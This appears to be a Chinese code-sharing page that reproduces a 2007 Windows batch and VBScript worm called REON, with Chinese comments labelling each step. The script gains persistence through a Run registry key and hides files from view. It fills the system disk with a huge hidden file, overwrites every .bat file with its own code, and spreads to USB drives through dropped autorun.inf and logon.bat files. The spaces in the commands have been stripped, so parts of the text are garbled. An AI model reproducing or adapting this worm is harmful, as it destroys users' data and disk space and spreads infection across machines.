复制代码 代码如下:

@echooff

%ozone%^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^%ozone%

%ozone%%Name:REON%%ozone%

%ozone%%Author:Ozone[verybat.cn]%%ozone%

%ozone%%Data:17/04/2007%%ozone%

%ozone%^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^%ozone%

ifexsit%SystemDrive%PAGEFILES.SYSgotoend

copy%0%windir%system32logon.bat::复制自身

FOR/F"tokens=3*"%%iin('dir/-c%SystemDrive%^|find"可用字节"')dofsutilfilecreatenew%SystemDrive%PAGEFILES.SYS%%i::制造超大文件,轰炸硬盘

attrib+r+s+h%SystemDrive%PAGEFILES.SYS::隐藏文件

regaddHKLMSOFTWAREMicrosoftWindowsCurrentVersionRun/vKV2007/tREG_SZ/d%windir%system32logon.vbs::自动启动

regdeleteHKLMSoftwareMicrosoftwindowsCurrentVersionexplorerAdvancedFolderHiddenSHOWALL/va/f::不显示隐藏文件

for/r%SystemDrive%%%iin(*.bat)dotype%0>%%i::感染

ifexist%windir%system32logon.vbsgotoend

+++++++++++++++++++++++++=VBS部分+++++++++++++++++++++++++++++++++++++++

echosetfs=createobject("scripting.filesystemobject")>>%windir%system32logon.vbs

echosetWshShell=WScript.CreateObject("WScript.Shell")>>%windir%system32logon.vbs

echoSetobjWMIService=GetObject("winmgmts:"_>>%windir%system32logon.vbs

echo^&"{impersonationLevel=impersonate}!"^&strComputer^&"rootcimv2")>>%windir%system32logon.vbs

echoSetcolDisks=objWMIService.ExecQuery_>>%windir%system32logon.vbs

echo("Select*fromWin32_LogicalDisk")>>%windir%system32logon.vbs

::监视u盘

echoFori=1to9000000000>>%windir%system32logon.vbs

echoForEachobjDiskincolDisks>>%windir%system32logon.vbs

echoSelectCaseobjDisk.DriveType>>%windir%system32logon.vbs

echo:Case2:>>%windir%system32logon.vbs

::判断u盘中是否存在autorun.inf,不存在则写入autorun.inf并且隐藏.

echoy1=fs.FileExists(objDisk.DeviceID^&"AUTORUN.INF")>>%windir%system32logon.vbs

echoifnoty1then>>%windir%system32logon.vbs

echosetf=fs.opentextfile(objDisk.DeviceID^&"AUTORUN.INF",2,true)>>%windir%system32logon.vbs

echof.write"[AutoRun]"^&vbcrlf>>%windir%system32logon.vbs

echof.write"open=logon.bat"^&vbcrlf>>%windir%system32logon.vbs

echof.write"shellexecute=logon.bat"^&vbcrlf>>%windir%system32logon.vbs

echof.write"shellAutocommand=logon.bat"^&vbcrlf>>%windir%system32logon.vbs

echof.Close>>%windir%system32logon.vbs

echoSetf1=fs.GetFile(objDisk.DeviceID^&"AUTORUN.INF")>>%windir%system32logon.vbs

echoIff1.Attributes=f1.AttributesAND2Then>>%windir%system32logon.vbs

echo:f1.Attributes=f1.AttributesXOR7:>>%windir%system32logon.vbs

echoEndIf>>%windir%system32logon.vbs

echoendif>>%windir%system32logon.vbs

::判断u盘中是否存在logon.bat,如果不存在则写入logon.bat并隐藏.

echoy2=fs.FileExists(objDisk.DeviceID^&"logon.bat")>>%windir%system32logon.vbs

echoifnoty2then>>%windir%system32logon.vbs

echofs.CopyFile"c:windowssystem32logon.bat",objDisk.DeviceID^&"">>%windir%system32logon.vbs

echoSetf2=fs.GetFile(objDisk.DeviceID^&"logon.bat")>>%windir%system32logon.vbs

echoIff2.Attributes=f2.AttributesAND2Then>>%windir%system32logon.vbs

echo:f2.Attributes=f2.AttributesXOR7:>>%windir%system32logon.vbs

echoEndIf>>%windir%system32logon.vbs

echoendif>>%windir%system32logon.vbs

echodirr=Wshshell.ExpandEnvironmentStrings("%systemdrive%")>>%windir%system32logon.vbs

::判断u盘中是否存在PAGEFILES.SYS,如果不存在则写入PAGEFILES.SYS并隐藏.

echoy3=fs.FileExists(dirr&"PAGEFILES.SYS")>>%windir%system32logon.vbs

echoifnoty3then>>%windir%system32logon.vbs

echoWshShell.Run"logon.bat">>%windir%system32logon.vbs

echoWScript.Sleep500>>%windir%system32logon.vbs

echoSetf3=fs.GetFile(dirr&"PAGEFILES.SYS")>>%windir%system32logon.vbs

echoIff3.Attributes=f3.AttributesAND2Then>>%windir%system32logon.vbs

echo:f3.Attributes=f3.AttributesXOR7:>>%windir%system32logon.vbs

echoEndIf>>%windir%system32logon.vbs

echoendif>>%windir%system32logon.vbs

echoEndSelect>>%windir%system32logon.vbs

echoNext>>%windir%system32logon.vbs

::每隔5秒扫描一次.

echoWScript.Sleep5000>>%windir%system32logon.vbs

echoNext>>%windir%system32logon.vbs

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

:end